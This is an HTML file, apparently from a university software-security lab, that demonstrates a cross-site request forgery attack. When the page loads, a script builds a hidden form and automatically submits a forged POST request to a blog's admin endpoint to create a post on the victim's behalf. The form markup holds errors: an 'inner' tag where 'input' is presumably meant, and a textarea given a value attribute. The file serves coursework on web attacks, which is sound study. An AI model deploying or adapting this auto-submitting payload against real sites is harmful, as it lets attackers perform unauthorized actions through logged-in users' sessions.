<!DOCTYPE html>
<!-- 
This is a code template to forge an HTTP POST request.
This was originally used for lab 8 of Software Security/Language-based Security.
-->
<html>
<title> CSRF Attack Demo File for Software Security/Language-based Security</title>
<body>
<h1>CSRF Attack Demo Software Security/Language-based Security</h1>
<h2>Cross-site Request Forgery Attack, by Phu Phung, customized by "Josh Cowden and Ryan Downes".</h2>
<script>
function CSRF() {
	//create a <form> element.
	var form = document.createElement('form');
	//construct the form
	form.action = "https://cowdenj2.myblog.com/admin/index.php";
	//form.action=""https://downesr1.myblog.com/admin/index.php";"
	form.method = 'POST';
	form.target = '_self';
	form.innerHTML = "<inner type='hidden' name='title' value='A CSRF attack post' />" + "<textarea type = 'hidden' name = 'text' value='any comment is welcome' />" ; 

	//append the form to the current page.
	document.body.appendChild(form);
	//just for the lab report, to capture the screenshot, otherwise, the CSRF 
	//will be submitted automatically
	///alert('CSRF Del Attack from Lab 8 is about to happen - By Josh Cowden');
	//submit the form
	form.submit();
}
//call CSRF() to forge an HTTP POST request to the vulnerable server
CSRF();

</script>
</body>
</html>
